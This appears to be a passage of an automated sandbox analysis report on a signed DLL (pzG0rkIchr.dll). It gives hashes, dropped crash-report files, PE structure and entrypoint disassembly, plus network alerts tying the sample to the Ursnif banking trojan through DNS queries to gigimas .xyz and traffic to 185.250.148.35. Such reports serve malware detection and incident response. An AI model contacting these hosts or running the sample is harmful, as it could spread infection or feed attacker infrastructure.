                              SHA1:BB145548E992EC8183CD51D92E4C3494DE7B0EC1
                              SHA-256:402CD5EB9A3A996EB553A8C5485895A3AD576D1556CCCB08E20366B7A3C00A40
                              SHA-512:794C6926A380144449AA7C24BA1407D67EA8A41F89ABAD333313D324799DBC1F4C76D52F49A91D112AF60FCA87CA01F12F0F7648B4AAB095A5AB367A8DDE84AA
                              Malicious:false
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.3.7.7.0.2.5.5.9.0.6.7.1.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.3.7.7.0.2.7.4.4.0.6.6.7.6.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.9.e.6.c.7.3.8.-.b.f.f.7.-.4.b.6.8.-.b.7.e.a.-.0.d.5.0.5.d.9.5.7.9.4.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.4.9.2.a.f.f.d.-.7.3.5.e.-.4.c.a.7.-.a.0.e.b.-.9.9.7.a.b.a.e.1.b.4.1.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.p.z.G.0.r.k.I.c.h.r...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.9.c.-.0.0.0.1.-.0.0.1.f.-.0.3.9.0.-.a.1.e.e.0.8.0.0.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.f.3.4.c.c.f.d.d.8.1.4.1.a.e.e.e.2.e.8.9.f.f.b.0.7.0.c.e.2.3.9.c.7.d.0.0.7.0.6.!.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER148A.tmp.WERInternalMetadata.xml

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8606
                              Entropy (8bit):3.6917131740684326
                              Encrypted:false
                              SSDEEP:192:Rrl7r3GLNibXpiH6YmObgmf9lpSDUf9CpDz89bv7QfAFm:RrlsNiLpiH6Yvbgmf9lpSWv8fv
                              MD5:A25026BF04BD3F85B66322DD4EACE463
                              SHA1:3E6F42AACBDC7749C351F4040836974F0FE849E8
                              SHA-256:EF29167FAC14085CEDC2B51E3DD871909F41CF22CD799EE08F16E10BC5F25340
                              SHA-512:7AF918F7B179540C5C0250F8E7C698AEFA2B7873F29B792D886EA8256C447CA561DA47EC2668FB3972F8F954F438D84DF8C98E8C447248C17C7FD927D4793FD3
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.4.4.<./.P.i.d.>.......

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER1BBF.tmp.xml

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4852
                              Entropy (8bit):4.453732860738506
                              Encrypted:false
                              SSDEEP:48:cvIwSD8zs/JgtBI9C0Wgc8sqYjHs8fm8M4JCXCODFSoyq8vhObZESC5S6d:uITfhEtgrsqYTRJeWqVv6d
                              MD5:36514A65B9F12B58AFD0BBEC14BB306B
                              SHA1:708D342C0B5E7C27C165196A66BA72199935C035
                              SHA-256:1E2FDEB64300A379966992E05CDCED721176C203B2AEA77D8521699282520391
                              SHA-512:0042E849F66066FE1C66E48516FCD7B735C49DB80A33C73C025965CC1544002AD8246D1716241A37BD1855EF92F2DB6540A3373E1D7E89B58447CAD2420BA6A9
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1794161" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC66.tmp.dmp

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Mini DuMP crash report, 14 streams, Thu Nov 24 13:31:29 2022, 0x1205a4 type
                              Category:dropped
                              Size (bytes):57126
                              Entropy (8bit):1.6752029810543265
                              Encrypted:false
                              SSDEEP:192:QRENUeRlXOC5Ky21na9OBQpyomWlAgh0l:XeC0VQ9Oupy
                              MD5:15A22FD2F4CA8ECE4C09E779E8BF5301
                              SHA1:CF2A33C45D5845C636A662FBC221FF128EFFE3D2
                              SHA-256:32AE357A2D002F95865AC8D24FA48BEEC756DF4547D071DA783E4676C7DE6702
                              SHA-512:532611BDCDEE7F036330CAEB750CA8681D325436E10FF99A3F12B55C97ABC60D206C7105F426E3E76A10F88F9B2EE8D5C000E752DEDA295729A94B0DC84161D6
                              Malicious:false
                              Preview:MDMP....... .......1r.c.........................................)..........T.......8...........T...............F...........T...........@....................................................................U...........B..............Lw.....................T............r.c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERCF55.tmp.WERInternalMetadata.xml

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8528
                              Entropy (8bit):3.6927747114398133
                              Encrypted:false
                              SSDEEP:192:Rrl7r3GLNiXByMiO6Ymf7lay5gmfQeSiR9CprRA89bNz14fsDvm:RrlsNixNiO6YOngmfQeSh9Nzafl
                              MD5:62C5858D004322A987DA836EAAFCF3D0
                              SHA1:92F1D11A4FFAF0BC607AD9D80B0733B9C0AF776C
                              SHA-256:E4ADEDF6BDB44F7A887C8FAEFA13E8932F54043F510FC6E6F6C9AD763A3D5E0E
                              SHA-512:2244B303A7B773AE32265E693A04F0DA0A6A1BD91CF90B58BD31F51770ECA29D0D7A8DEB1E80090473442B0E03FCDBAB3F6A377970F38D5F9211160FD7739682
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERD021.tmp.xml

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4733
                              Entropy (8bit):4.475037901948798
                              Encrypted:false
                              SSDEEP:48:cvIwSD8zsKJgtBI9C0Wgc8sqYjK8fm8M4JCXCO/Flyq85m2knZESC5Sgd:uITfYEtgrsqYLJCTnVvgd
                              MD5:B4E9E6B35D1BFAE0CB99ADA1D8BA4FB0
                              SHA1:000AD3F75949E7EB512EA021578BBCF408B9AB13
                              SHA-256:256C84BFDE399833C36F0B05ED98CD72BC1507AE7C28D6DE773C33253673138B
                              SHA-512:A55F7E52226C64C2A45E23FA853E1DA40F9D8DC41F8488A1F634AEB597EE0EE61056CC453C7AAA61B35751E720B0504EA500D7A0FE7652D988AC45BBACE39349
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1794162" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC43.tmp.dmp

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Mini DuMP crash report, 15 streams, Thu Nov 24 13:31:09 2022, 0x1205a4 type
                              Category:dropped
                              Size (bytes):31470
                              Entropy (8bit):2.120966153641428
                              Encrypted:false
                              SSDEEP:96:5U8oyl8/7PSDKwNULtCTy+poi7C5VZ5ro8189EzF5oFPV4sGvTWIXmIf4ywMGVl9:FoyWocCTyOC5KwzzoAtkUWa
                              MD5:53678B23171E44FF503435C4B6EE4E82
                              SHA1:CBBF51D8D6EC4215E00C23AE2CB2DDEE3D01CF47
                              SHA-256:EBE61E60D7251461BAA6A84830EBD1CA17739D2616F7DB1BD0555EBCE7BE7F4A
                              SHA-512:EAFB2D40ACE89BDF7B02C147E9C69D9FADEBD0000C1260C46078197DA96E561B571A5BEC7D653A614A8BAEE730299C8F78C5FA7380557B3F3D86542FA0324D6A
                              Malicious:false
                              Preview:MDMP....... ........r.c............4...........L...H.......$...........T...z...........`.......8...........T...........(....o...........................................................................................U...........B......<.......Lw......................T............q.c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................

                              Static File Info

                              General

                              File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Entropy (8bit):6.637392883592079
                              TrID:
                              • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                              • Win64 Executable (generic) (12005/4) 10.17%
                              • Generic Win/DOS Executable (2004/3) 1.70%
                              • DOS Executable Generic (2002/1) 1.70%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                              File name:pzG0rkIchr.dll
                              File size:290568
                              MD5:d6ef4778f7dc9c31a0a2a989ef42d2fd
                              SHA1:5dad8394ef37d5a006674589754f7a3187d303b1
                              SHA256:54de1f2c26a63a8f6b7f8d5de99f8ebd4093959ab07f027db1985d0652258736
                              SHA512:997b57424364ff661d80ca6efc5b7e91f2204d1ed7c4d784ee7d6134bc06952c993de038d6a25c71a7949b08ddd8cc5d167f8c753379f69ee1b6b49342fafa63
                              SSDEEP:6144:wHyvumb1p7CC8VoxOJbceNOHI2Tse2RTggR/Znv+yit:Smbrgu2so2TVwcK/ZnG/t
                              TLSH:ED54BF41F3D904A6D9138D3D8857562BEBF13C212214DA5F8B50C36A6F37BA1E739B22
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!5..eT..eT..eT....Z.`T....X..T....Y.hT..^...bT..^...qT..^...uT....`.fT..eT...T......gT......dT......dT..RicheT..........PE..d..

                              File Icon

                              Icon Hash:74f0e4ecccdce0e4

                              Static PE Info

                              General

                              Entrypoint:0x18000b6ec
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x180000000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                              Time Stamp:0x62C42DD7 [Tue Jul 5 12:25:59 2022 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:0
                              File Version Major:6
                              File Version Minor:0
                              Subsystem Version Major:6
                              Subsystem Version Minor:0
                              Import Hash:4270d9bbb54b179372d82277269282e6

                              Authenticode Signature

                              Signature Valid:true
                              Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                              Signature Validation Error:The operation completed successfully
                              Error Number:0
                              Not Before, Not After
                              • 7/5/2021 5:00:00 PM 7/6/2022 4:59:59 PM
                              Subject Chain
                              • CN=NAILS UNLIMITED LIMITED, O=NAILS UNLIMITED LIMITED, L=DORCHESTER, S=Dorset, C=GB
                              Version:3
                              Thumbprint MD5:71834A68FD130C9D08796B4F19A6FC67
                              Thumbprint SHA-1:CA69087AAAA087346202AD16228337130511C4C5
                              Thumbprint SHA-256:F13E4801E13898E839183E3305E1DDA7F4C0EBF6EAF7553E18C1DDD4EDC94470
                              Serial:2F96A89BFEC6E44DD224E8FD7E72D9BB

                              Entrypoint Preview

                              Instruction
                              dec eax
                              mov dword ptr [esp+08h], ebx
                              dec eax
                              mov dword ptr [esp+10h], esi
                              push edi
                              dec eax
                              sub esp, 20h
                              dec ecx
                              mov edi, eax
                              mov ebx, edx
                              dec eax
                              mov esi, ecx
                              cmp edx, 01h
                              jne 00007FBFC4794AE7h
                              call 00007FBFC4794EE0h
                              dec esp
                              mov eax, edi
                              mov edx, ebx
                              dec eax
                              mov ecx, esi
                              dec eax
                              mov ebx, dword ptr [esp+30h]
                              dec eax
                              mov esi, dword ptr [esp+38h]
                              dec eax
                              add esp, 20h
                              pop edi
                              jmp 00007FBFC479495Ch
                              int3
                              int3
                              int3
                              dec eax
                              sub esp, 28h
                              call 00007FBFC4795378h
                              test eax, eax
                              je 00007FBFC4794B03h
                              dec eax
                              mov eax, dword ptr [00000030h]
                              dec eax
                              mov ecx, dword ptr [eax+08h]
                              jmp 00007FBFC4794AE7h
                              dec eax
                              cmp ecx, eax
                              je 00007FBFC4794AF6h
                              xor eax, eax
                              dec eax
                              cmpxchg dword ptr [00038A68h], ecx
                              jne 00007FBFC4794AD0h
                              xor al, al
                              dec eax
                              add esp, 28h
                              ret
                              mov al, 01h
                              jmp 00007FBFC4794AD9h
                              int3
                              int3
                              int3
                              dec eax
                              sub esp, 28h
                              call 00007FBFC479533Ch
                              test eax, eax
                              je 00007FBFC4794AE9h
                              call 00007FBFC479515Fh
                              jmp 00007FBFC4794AFBh
                              call 00007FBFC4795324h
                              mov ecx, eax
                              call 00007FBFC4796A91h
                              test eax, eax
                              je 00007FBFC4794AE6h
                              xor al, al
                              jmp 00007FBFC4794AE9h
                              call 00007FBFC4796E18h
                              mov al, 01h
                              dec eax
                              add esp, 28h
                              ret
                              dec eax
                              sub esp, 28h
                              xor ecx, ecx
                              call 00007FBFC4794C26h
                              test al, al
                              setne al
                              dec eax
                              add esp, 28h
                              ret
                              int3
                              int3

                              Rich Headers

                              Programming Language:
                              • [C++] VS2015 UPD3.1 build 24215
                              • [EXP] VS2015 UPD3.1 build 24215
                              • [LNK] VS2015 UPD3.1 build 24215

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x371c00x94.rdata
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x372540x28.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x460000x15cc.pdata
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x446000x2908
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x490000x618.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x34dd00x1c.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x34df00x94.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x230000x2a8.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x213900x21400False0.6091694078947368zlib compressed data6.321988758719223IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x230000x14b400x14c00False0.5551228350903614data5.589680054404924IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x380000xd3780xc200False0.581286243556701data4.475772855701728IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .pdata0x460000x15cc0x1600False0.49556107954545453data5.3249872988992655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .gfids0x480000x940x200False0.248046875data1.4095612964443904IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x490000x6180x800False0.54150390625data4.760086879502757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Imports

                              DLLImport
                              KERNEL32.dllCreateFileA, LockFile, ReadFile, SetEndOfFile, UnlockFile, CloseHandle, PeekNamedPipe, HeapCreate, HeapAlloc, HeapFree, GetProcessHeap, HeapWalk, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, WaitForSingleObject, ExitProcess, CreateThread, VirtualAlloc, GetProcAddress, CreateFileMappingA, LoadLibraryA, CreateNamedPipeA, CallNamedPipeA, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, RtlUnwindEx, InterlockedFlushSList, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetCurrentProcess, TerminateProcess, GetModuleHandleExW, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStdHandle, GetFileType, GetStringTypeW, CreateFileW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, ReadConsoleW, SetFilePointerEx, WriteConsoleW, RaiseException

                              Exports

                              NameOrdinalAddress
                              DllRegisterServer10x180002380
                              ItsnPq5v20x180002390
                              QlqYo259k30x180017c20
                              XeFnYZ40940x1800175e0

                              Network Behavior

                              Snort IDS Alerts

                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                              192.168.2.48.8.8.864906532039645 11/24/22-05:22:35.810533UDP2039645ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz)6490653192.168.2.48.8.8.8
                              192.168.2.48.8.8.861007532039645 11/24/22-05:20:02.978332UDP2039645ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz)6100753192.168.2.48.8.8.8
                              192.168.2.48.8.8.861124532039645 11/24/22-05:21:04.451832UDP2039645ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz)6112453192.168.2.48.8.8.8
                              192.168.2.48.8.8.859444532039645 11/24/22-05:21:34.871041UDP2039645ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz)5944453192.168.2.48.8.8.8
                              192.168.2.48.8.8.855570532039645 11/24/22-05:22:05.359167UDP2039645ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz)5557053192.168.2.48.8.8.8
                              192.168.2.48.8.8.860686532039645 11/24/22-05:20:33.386749UDP2039645ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz)6068653192.168.2.48.8.8.8
                              192.168.2.48.8.8.859446532039645 11/24/22-05:23:06.390786UDP2039645ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz)5944653192.168.2.48.8.8.8

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 24, 2022 05:31:42.779120922 CET49713443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:31:42.779216051 CET44349713185.250.148.35192.168.2.3
                              Nov 24, 2022 05:31:42.779381990 CET49713443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:31:42.783556938 CET49713443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:31:42.783611059 CET44349713185.250.148.35192.168.2.3
                              Nov 24, 2022 05:31:42.841033936 CET44349713185.250.148.35192.168.2.3
                              Nov 24, 2022 05:31:42.848084927 CET49714443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:31:42.848155022 CET44349714185.250.148.35192.168.2.3
                              Nov 24, 2022 05:31:42.848277092 CET49714443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:31:42.849534035 CET49714443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:31:42.849570036 CET44349714185.250.148.35192.168.2.3
                              Nov 24, 2022 05:31:42.906461954 CET44349714185.250.148.35192.168.2.3
                              Nov 24, 2022 05:31:42.909106970 CET49715443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:31:42.909188032 CET44349715185.250.148.35192.168.2.3
                              Nov 24, 2022 05:31:42.910044909 CET49715443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:31:42.910046101 CET49715443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:31:42.910130024 CET44349715185.250.148.35192.168.2.3
                              Nov 24, 2022 05:31:42.965094090 CET44349715185.250.148.35192.168.2.3
                              Nov 24, 2022 05:31:42.970076084 CET49716443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:31:42.970132113 CET44349716185.250.148.35192.168.2.3
                              Nov 24, 2022 05:31:42.970264912 CET49716443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:31:42.971513033 CET49716443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:31:42.971546888 CET44349716185.250.148.35192.168.2.3
                              Nov 24, 2022 05:31:43.027291059 CET44349716185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:13.139549971 CET49717443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:13.139607906 CET44349717185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:13.139703989 CET49717443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:13.140322924 CET49717443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:13.140345097 CET44349717185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:13.197118044 CET44349717185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:13.198286057 CET49718443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:13.198349953 CET44349718185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:13.198457003 CET49718443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:13.198988914 CET49718443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:13.199012041 CET44349718185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:13.256309032 CET44349718185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:13.257666111 CET49719443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:13.257718086 CET44349719185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:13.257812023 CET49719443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:13.258507013 CET49719443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:13.258538961 CET44349719185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:13.315129042 CET44349719185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:13.322362900 CET49720443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:13.322433949 CET44349720185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:13.322513103 CET49720443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:13.323424101 CET49720443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:13.323457956 CET44349720185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:13.379005909 CET44349720185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:43.484684944 CET49721443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:43.484752893 CET44349721185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:43.484850883 CET49721443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:43.485667944 CET49721443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:43.485697031 CET44349721185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:43.541486025 CET44349721185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:43.542974949 CET49722443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:43.543049097 CET44349722185.250.148.35192.168.2.3
                              Nov 24, 2022 05:32:43.543201923 CET49722443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:43.543780088 CET49722443192.168.2.3185.250.148.35
                              Nov 24, 2022 05:32:43.543811083 CET44349722185.250.148.35192.168.2.3
